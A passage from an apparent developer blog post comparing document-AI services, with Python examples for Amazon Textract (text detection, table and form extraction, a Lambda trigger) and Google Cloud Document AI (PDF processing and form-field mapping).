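&lt;p&gt;To give a feel for the async side, here's a rough sketch of the start-then-poll pattern using &lt;code&gt;start_document_text_detection&lt;/code&gt; and &lt;code&gt;get_document_text_detection&lt;/code&gt;. The helper names are my own, the bucket and key are placeholders, and this assumes your AWS credentials are already configured.&lt;/p&gt;

```python
import time


def job_finished(status):
    """An async Textract job is done once JobStatus is terminal."""
    return status in ("SUCCEEDED", "FAILED", "PARTIAL_SUCCESS")


def detect_text_async(bucket, key, poll_seconds=5):
    """Sketch: start an async text-detection job on an S3 object and
    poll until it completes (no timeout or pagination handling here)."""
    import boto3  # assumes AWS credentials are configured

    textract = boto3.client("textract")
    job = textract.start_document_text_detection(
        DocumentLocation={"S3Object": {"Bucket": bucket, "Name": key}}
    )
    while True:
        resp = textract.get_document_text_detection(JobId=job["JobId"])
        if job_finished(resp["JobStatus"]):
            return resp
        time.sleep(poll_seconds)
```

In practice, AWS recommends subscribing to an SNS topic for job completion instead of polling in a tight loop, but the polling version is easier to follow.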

&lt;h3&gt;
  
  
  Code Example: Detect text from a local file
&lt;/h3&gt;

&lt;p&gt;This is the basic pattern if you just want the text out of a document. You read the file as bytes, call &lt;code&gt;detect_document_text&lt;/code&gt; and print the lines Textract finds.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;

&lt;span class="n"&gt;textract&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;textract&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# uses your AWS credentials
&lt;/span&gt;
&lt;span class="n"&gt;file_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sample-doc.png&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;  &lt;span class="c1"&gt;# can be any image format
&lt;/span&gt;
&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nf"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;file_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;rb&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;image_bytes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;textract&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;detect_document_text&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;Document&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Bytes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;image_bytes&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Blocks&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;BlockType&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;LINE&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Text&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What is happening here:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Textract analyzes the image or PDF and returns a list of Blocks that represent words, lines and other elements.&lt;/li&gt;
&lt;li&gt;You filter for blocks of type LINE and print their Text, which is enough for many basic OCR use cases or as a first step before sending text into an LLM.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Code Example: Extract tables and forms from S3
&lt;/h3&gt;

&lt;p&gt;To pull structured data from forms and tables, you use &lt;code&gt;analyze_document&lt;/code&gt; with the &lt;code&gt;FORMS&lt;/code&gt; and &lt;code&gt;TABLES&lt;/code&gt; feature types and point Textract at a document in S3.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;

&lt;span class="n"&gt;textract&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;textract&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;bucket_name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;my-doc-bucket&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;object_key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;invoices/invoice-001.png&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;textract&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;analyze_document&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;Document&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;S3Object&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Bucket&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;bucket_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Name&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;object_key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="n"&gt;FeatureTypes&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;FORMS&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;TABLES&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Blocks&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; blocks&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Quick peek at found tables
&lt;/span&gt;&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Blocks&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;BlockType&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;TABLE&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Detected a table with Id:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There's a lot more you can do with Textract beyond this. For more details, check out the &lt;a href="https://docs.aws.amazon.com/textract/latest/dg/what-is-textract.html" rel="noopener noreferrer"&gt;Textract documentation&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;In production you usually wire this up with S3 triggers and Lambda so new documents are picked up and processed automatically.&lt;/p&gt;
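&lt;p&gt;That wiring can be sketched roughly like this. The handler shape follows the standard S3 event format; the &lt;code&gt;extract_lines&lt;/code&gt; helper is my own, and persisting the results is left as a comment.&lt;/p&gt;

```python
import json


def extract_lines(blocks):
    """Pull just the LINE text out of a Textract Blocks list."""
    return [b["Text"] for b in blocks if b["BlockType"] == "LINE"]


def lambda_handler(event, context):
    """Sketch: triggered by an S3 put event, runs Textract on the new object."""
    import boto3  # available by default in the Lambda Python runtime

    textract = boto3.client("textract")
    record = event["Records"][0]["s3"]
    resp = textract.detect_document_text(
        Document={
            "S3Object": {
                "Bucket": record["bucket"]["name"],
                "Name": record["object"]["key"],
            }
        }
    )
    lines = extract_lines(resp["Blocks"])
    # In a real pipeline you would persist these, e.g. to DynamoDB or S3
    return {"statusCode": 200, "body": json.dumps({"lines": lines})}
```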

&lt;p&gt;Here's a quick intro to Amazon Textract. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/5Cs4_e2CJRo"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://cloud.google.com/document-ai" rel="noopener noreferrer"&gt;5. Google Cloud Document AI&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fztf6r43zpl0z6v5on0g1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fztf6r43zpl0z6v5on0g1.png" alt="Google Cloud Document AI"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Document AI is Google Cloud’s document stack that gives you ready made processors for invoices, receipts, forms, IDs and general OCR. You pick a processor, send it a file and get back a &lt;code&gt;Document&lt;/code&gt; object with text, structure, entities and layout info, not just raw strings.&lt;/p&gt;

&lt;p&gt;The nice part is how it fits into the rest of GCP (Google Cloud Platform). You can drop files into Cloud Storage, trigger processing with Pub/Sub or Cloud Functions or Cloud Run, then push clean data into BigQuery or your app.&lt;/p&gt;

&lt;h3&gt;
  
  
  Use it when you want:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Prebuilt processors&lt;/strong&gt; - invoice, receipt, form, ID and general OCR processors that work out of the box.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tables and forms&lt;/strong&gt; - key value pairs and tables straight from scanned PDFs and images.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Custom models&lt;/strong&gt; - custom extractors, classifiers and splitters when your docs do not match the prebuilt ones.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cloud pipelines&lt;/strong&gt; - runs close to Cloud Storage, Cloud Run and Vertex AI so it is easy to wire into existing GCP setups.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Code Example: Send a PDF and read the text
&lt;/h3&gt;

&lt;p&gt;This is the usual Python flow. You create a processor in the console, grab its ID, then call it from your code.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.cloud&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;documentai&lt;/span&gt;

&lt;span class="n"&gt;project_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;your-project-id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;location&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;us&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;processor_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;your-processor-id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;file_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;path/to/document.pdf&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="n"&gt;client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;documentai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;DocumentProcessorServiceClient&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;processor_path&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;project_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;location&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;processor_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nf"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;file_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;rb&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;file_bytes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="n"&gt;raw_document&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;documentai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;RawDocument&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;file_bytes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;mime_type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;application/pdf&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;request&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;documentai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;ProcessRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;raw_document&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;raw_document&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;process_document&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;doc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;document&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;doc&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You send raw bytes plus the MIME type, Document AI runs the selected processor and you get back a &lt;code&gt;Document&lt;/code&gt; object. For quick use cases, grabbing &lt;code&gt;doc.text&lt;/code&gt; is enough.&lt;/p&gt;

&lt;h3&gt;
  
  
  Code Example: Turn a parsed form into fields
&lt;/h3&gt;

&lt;p&gt;If you use a form style processor, Document AI already marks fields as key value pairs, which you can loop over and map into your own schema.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;clean&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt; &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="n"&gt;form_doc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;doc&lt;/span&gt;  &lt;span class="c1"&gt;# from the previous example. see above
&lt;/span&gt;
&lt;span class="n"&gt;fields&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;page&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;form_doc&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pages&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;field&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;page&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;form_fields&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;clean&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;field_name&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text_anchor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;clean&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;field_value&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text_anchor&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;conf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;field&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;field_value&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;confidence&lt;/span&gt;
        &lt;span class="n"&gt;fields&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;conf&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;conf&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;fields&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; (conf &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;conf&lt;/span&gt;&lt;span class="si"&gt;:&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the point where a scanned form basically becomes plain Python data. From here, you can push it into BigQuery, Firestore or any other service you use on GCP.&lt;/p&gt;
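&lt;p&gt;As one small example of that mapping step, here's a sketch that turns the &lt;code&gt;(name, value, confidence)&lt;/code&gt; tuples from above into a dict, dropping low-confidence fields. The helper name and the 0.5 threshold are my own choices, not anything Document AI prescribes.&lt;/p&gt;

```python
def fields_to_dict(fields, min_conf=0.5):
    """Turn (name, value, confidence) tuples into a plain dict,
    skipping fields below the confidence threshold."""
    return {name: value for name, value, conf in fields if conf >= min_conf}

# e.g. record = fields_to_dict(fields)  # ready for BigQuery / Firestore
```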

&lt;p&gt;This is just a start, and there's a lot more to it. Visit the &lt;a href="https://cloud.google.com/document-ai" rel="noopener noreferrer"&gt;documentation&lt;/a&gt; to learn more.&lt;/p&gt;

&lt;p&gt;Here's a quick introduction to Google Cloud Document AI. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/F_jyoe1lQhg"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;If you think of any other handy AI tools that I haven't covered in this article, do share them in the comments section below. ✌️&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;So, that is it for this article. Thank you so much for reading! 🎉🫡&lt;/p&gt;

